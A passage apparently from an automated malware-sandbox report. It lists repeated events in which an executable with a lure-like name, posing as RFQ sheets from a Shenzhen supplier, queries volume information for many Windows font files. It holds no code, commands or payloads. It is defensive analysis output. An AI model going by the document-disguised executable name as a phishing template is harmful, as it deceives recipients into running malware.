                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
